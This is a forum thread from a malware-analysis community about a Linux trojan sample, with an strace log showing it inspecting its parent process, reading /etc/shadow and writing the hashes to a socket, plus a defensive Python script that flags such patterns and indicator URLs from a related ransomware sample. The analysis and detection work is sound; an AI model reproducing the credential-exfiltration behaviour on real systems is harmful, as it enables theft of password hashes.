A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #29222  by tWiCe
 Tue Sep 13, 2016 1:15 pm
It's not malware that you'll find in the wild. Most likely it's generated for educational purposes.
 #29731  by perlish
 Thu Dec 15, 2016 2:44 pm
FafZee wrote: Sample:
What's the password of Linux.CyberEurope?
Thank you.
 #29734  by EP_X0FF
 Thu Dec 15, 2016 4:39 pm
perlish wrote:
FafZee wrote: Sample:
What's the password of Linux.CyberEurope?
Thank you.
infected is the default pass.
 #29739  by perlish
 Fri Dec 16, 2016 12:28 pm
[root@i-0spjvlla bot]# strace -f ./47dedb0a5a40ff81d5d59f39f93bb5dd7ffebcc09b6d6247d30cef12ee7d8662
execve("./47dedb0a5a40ff81d5d59f39f93bb5dd7ffebcc09b6d6247d30cef12ee7d8662", ["./47dedb0a5a40ff81d5d59f39f93bb5"...], [/* 22 vars */]) = 0
uname({sys="Linux", node="i-0spjvlla", ...}) = 0
brk(0) = 0x20d3000
brk(0x20d41c0) = 0x20d41c0
arch_prctl(ARCH_SET_FS, 0x20d3880) = 0
readlink("/proc/self/exe", "/data/bot/47dedb0a5a40ff81d5d59f"..., 4096) = 74
brk(0x20f51c0) = 0x20f51c0
brk(0x20f6000) = 0x20f6000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
getppid() = 16804
open("/proc/16804/cmdline", O_RDONLY) = 3
read(3, "strace\0-f\0./47dedb0a5a40ff81d5d5", 32) = 32
close(3) = 0
getppid() = 16804
open("/proc/16804/status", O_RDONLY) = 3
read(3, "Name:\tstrace\nState:\tS (sleeping)", 32) = 32
close(3) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(179), sin_addr=inet_addr("198.216.87.22")}, 16) = -1 ETIMEDOUT (Connection timed out)
open("/etc/shadow", O_RDONLY) = 4
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 5
connect(5, {sa_family=AF_INET, sin_port=htons(2222), sin_addr=inet_addr("127.127.127.127")}, 16) = -1 ECONNREFUSED (Connection refused)
read(4, "root:$6$3IDK7UQk$4qP6R5nocX2DVpL"..., 1024) = 678
write(5, "root:$6$3IDK7UQk$4qP6R5nocX2DVpL"..., 678) = -1 EPIPE (Broken pipe)
--- SIGPIPE {si_signo=SIGPIPE, si_code=SI_USER, si_pid=16809, si_uid=0} ---
+++ killed by SIGPIPE +++
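Reading the trace above from a defender's side: the sample looks up its parent with getppid() and opens /proc/<ppid>/cmdline and status (checking whether it runs under strace), then opens /etc/shadow and writes its contents to a freshly connected socket. The script below is an added example, not from the thread or the sample's author; it keeps a small fd table while walking strace lines and reports those two patterns. The trace it runs on is a constructed abridgement of perlish's output.

```python
import re

# Constructed sample: abridged from the strace output quoted in the post above.
SAMPLE_TRACE = r'''getppid() = 16804
open("/proc/16804/cmdline", O_RDONLY) = 3
read(3, "strace\0-f\0./47dedb0a5a40ff81d5d5", 32) = 32
close(3) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(179), sin_addr=inet_addr("198.216.87.22")}, 16) = -1 ETIMEDOUT (Connection timed out)
open("/etc/shadow", O_RDONLY) = 4
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 5
connect(5, {sa_family=AF_INET, sin_port=htons(2222), sin_addr=inet_addr("127.127.127.127")}, 16) = -1 ECONNREFUSED (Connection refused)
read(4, "root:$6$3IDK7UQk$4qP6R5nocX2DVpL"..., 1024) = 678
write(5, "root:$6$3IDK7UQk$4qP6R5nocX2DVpL"..., 678) = -1 EPIPE (Broken pipe)
'''

SENSITIVE_FILES = {"/etc/shadow", "/etc/passwd", "/etc/gshadow"}
SYSCALL_RE = re.compile(r'^(\w+)\((.*)\)\s*=\s*(-?\d+)')
PEER_RE = re.compile(r'htons\((\d+)\).*inet_addr\("([^"]+)"\)')

def triage_strace(trace: str) -> list:
    """Track fds across an strace log; flag parent inspection, credential reads and socket writes of them."""
    fds, ppid, leaked, findings = {}, None, set(), []
    for m in filter(None, map(SYSCALL_RE.match, trace.splitlines())):  # skips signal/resumed lines
        name, args, ret = m.groups()
        fd = args.split(",")[0].strip()   # first arg is the fd for read/write/connect/close
        if name == "getppid":
            ppid = ret
        elif name == "open":
            path = args.split('"')[1]
            if ret != "-1":
                fds[ret] = "file:" + path
            if ppid and path.startswith(f"/proc/{ppid}/"):
                findings.append(f"anti-analysis: inspects parent process via {path}")
        elif name == "socket" and ret != "-1":
            fds[ret] = "socket:unconnected"
        elif name == "connect" and (peer := PEER_RE.search(args)):
            fds[fd] = f"socket:{peer.group(2)}:{peer.group(1)}"
        elif name == "close":
            fds.pop(fd, None)             # fd numbers are reused, so forget the old target
        elif name == "read":
            target = fds.get(fd, "")
            if target.startswith("file:") and target[5:] in SENSITIVE_FILES:
                leaked.add(target[5:])
                findings.append(f"credential access: reads {target[5:]}")
        elif name == "write" and fds.get(fd, "").startswith("socket:") and leaked:
            # even a failed write (EPIPE in the trace) shows the intent to exfiltrate
            findings.append(f"exfiltration attempt: sends {sorted(leaked)} to {fds[fd][7:]}")
    return findings
```

Run it over a real `strace -f` log by feeding the file contents to `triage_strace`; lines prefixed with `[pid N]` would need that prefix stripped first.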
 #29744  by K_Mikhail
 Sat Dec 17, 2016 11:10 am
tWiCe wrote: A detailed description could be found here: http://vms.drweb.com/virus/?_is=1&i=8598627
A Trojan for Linux operating systems. Its code appears to have been written for research purposes as part of the https://cyber-europe.net project.
That's interesting, because the Linux.Encoder.6/HEUR:Trojan-Ransom.Linux.Arttec.a sample (SHA1: e460b9fffd9218db1191e07eca2197d83aec64cc) has similar strings:
:~> strings ~/111/e460b9fffd9218db1191e07eca2197d83aec64cc | grep 'cyber-europe.net'
http://www.cyber-europe.net/evl/grab/xx/get.php
Please visit http://www.cyber-europe.net/evl/anon/pay/transaction.php